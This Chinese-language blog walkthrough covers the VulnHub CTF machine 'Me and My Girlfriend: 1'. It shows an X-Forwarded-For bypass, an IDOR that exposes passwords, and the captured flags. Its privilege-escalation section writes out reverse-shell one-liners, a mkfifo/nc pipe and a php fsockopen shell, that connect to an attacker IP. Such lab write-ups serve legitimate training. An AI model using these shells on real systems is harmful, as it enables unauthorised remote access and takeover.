No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习
**
VulnHub-Me and My Girlfriend: 1-Walkthrough
**
靶机地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
靶机难度:中级(CTF)
靶机发布日期:2019年12月13日
靶机描述:
自Bulldog Industries遭受数次数据泄露以来已经过去了三年。在那时,他们已经恢复并重新命名为Bulldog.social,这是一家新兴的社交媒体公司。您可以接受这一新挑战并在他们的生产Web服务器上扎根吗?
这是标准的启动到根。您唯一的目标是进入根目录并查看祝贺消息,该如何操作取决于您!
难度:中级,有些事情您可能从未见过。仔细考虑所有问题:)
作者:大余
时间:2020-02-07
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:
我们已经找到了此次CTF目标计算机IP地址:192.168.56.142
nmap发现22、80端口开放着…
该WEB只能在本地访问…
是使用x-forwarded-for标头访问页面的…
利用burpsuite分析发现,利用x-forwarded-for注入可以正常访问,但是每次点下页面都需要注入一次很烦…就下载了插件…
在注册页面注册了dayu用户密码…因为dirb、nikto、gobuster和wfuzz枚举出来的页面都没啥有用的信息,跳过…
可以看到配置文件标题表示为user_id,对于dayu用户,它在URL中显示user-id=12…
这边我前面利用sqlmap测试了,并尝试使用LFI,都没效果…
这边可以看到我把12改成了1,选择Profile,出现了eweuhtandingan用户名…密码是密文,我尝试在前端源码修改下能否看到…
passwd修改为text,可以看到明文出现了:skuyatuh,用户:eweuhtandingan
获得用户名:aingmaung 密码:qwerty!!!
回到最初作者给的提示,可以看到存在Alice用户,直接找到即可…
成功找到用户:alice,密码:4lic3
二、提权
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
经过查看,在进来的目录下有两个隐藏文件,进入cache是空的,在my_secret下正常获得了flag1…
我本来想看看html下有什么PHP或者shell能直接利用的…发现了三个隐藏文件,分析下…
???这里看到了root疑似密码:ctf_pasti_bisa,ceban_corp应该是数据库密码? …等会试试,先继续看看…
在halamanPerusahaan隐藏文件中没啥利用的…
在misc中php文件的意思就是访问login或者register是login就执行…等等…没啥用
这里尝试了三个密码,就只有ctf_pasti_bisa正确登录了…
这些信息都是知道的…没啥用!!!
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
数据库没发现好的信息…直接尝试进root用户,发现成功…成功获得了root权限和查看了flag1和2…
这边前面进来我就习惯的sudo-l,发现还有另外提权的方法,继续讲…
(root) NOPASSWD: /usr/bin/php
可以看到这里的php可以提权…将php置于交互模式,并执行一个反向shell即可提权…go (这里shell随便写就是,非常多方法)
命令:sudo .... -a
命令:echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.103 443 >/tmp/f");
成功提权…另附上:php提权参考链接
推荐链接里的:php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
挺好用的,或者CMD等等…
这边我使用了两种方法来提权…我分析了会,没发现别的方法了,如果有别的未发现的,希望能告知我,谢谢,一起学习,加油!!!
由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习相关推荐
- Vulnhub靶机渗透学习——DC-9
本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...
- 编译原理习题(含答案)——4-7语法分析——MOOC哈尔滨工业大学陈鄞配套_学习通_慕课堂
1 如果文法G是无二义的,则它的任何句子α( ). A. 最左推导和最右推导对应的语法树必定相同 B. 最左推导和最右推导对应的语法树可能不同 C. 最左推导和最右推导必定相同 D. 可能存在两个不同 ...
- STM32F411RE NUCLEO标准库:报错#47;#20
STM32F411RE NUCLEO标准库: `关于STM32F411RE Nucleo开发板创建标准库的过程和相关的一些二错误解决 报错#47;#20 `这几天心血来潮了,想起再次学习ST_MCU, ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox10(Under Construction)
Vulnhub靶机FunBox10(Under Construction)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox5(NEXT LEVEL)
Vulnhub靶机FunBox5(NEXT LEVEL)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:H ...
- 提高C#编程水平的50个要点
1.总是用属性 (Property) 来代替可访问的数据成员 2.在 readonly 和 const 之间,优先使用 readonly 3.在 as 和 强制类型转换之间,优先使用 as 操作符 4 ...
- 提高C#编程水平的50个要诀[转载]
一篇旧时的文章,看后觉得还可以,特别贴出来. 提高C#编程水平的50个要点: 1.总是用属性 (Property) 来代替可访问的数据成员 2.在 readonly 和 const 之间,优先使用 ...
- 人工智能创意赛复选赛成绩单
总排名 参赛队伍名称 技术报告打分 视频打分 代码审核 总分 1 安徽财经大学-安财AI零队 25 55.5 √ 80.5 2 东北大学秦皇岛分校-NEUQ人工智能一队 25 53.5 √ 78.5 ...
- 彻底理解Python生成器和迭代器
目录 1.列表生成式 2.生成器 3.迭代器 4.对yield的总结 5.补充:itertools库学习 1.列表生成式 首先举个例子 现在有个需求,看列表 [0,1,2,3,4,5,6,7,8,9] ...
最新文章
- Python3.5源码分析-List概述
- 2016奥运男篮分组
- 链表 队列 基本概念 为什么使用二叉查找树 抽象数据类型
- 面试官问面向对象特点_最好的面试官有什么共同点?
- Mybatis+Oracle批处理
- pjsip代码分析(1)——modules框架
- linux下显示网卡设备及驱动信息intel shell脚本
- PreferenceActivity使用简介
- 关于STVP写保护等级2的问题
- 用八类网线钳和剥线刀做网线水晶头
- 英语不好、数学不好能自学编程吗?自学编程出路如何?老程告诉你
- ceph-创建使用rule-ssd规则的存储池
- 云服务显示服务器异常,云服务器显示异常登录
- 牛转乾坤,管理者必读这10本书
- 一文搞定JVM常见工具和优化策略
- 触碰十年后的自己(2026年)
- 使用Python控制手机(一)
- hackthebox-Tracks-Beginner_Track-Under_Construction
- CentOS opera 浏览器
- 股票突然出现断崖式下跌是什么原因?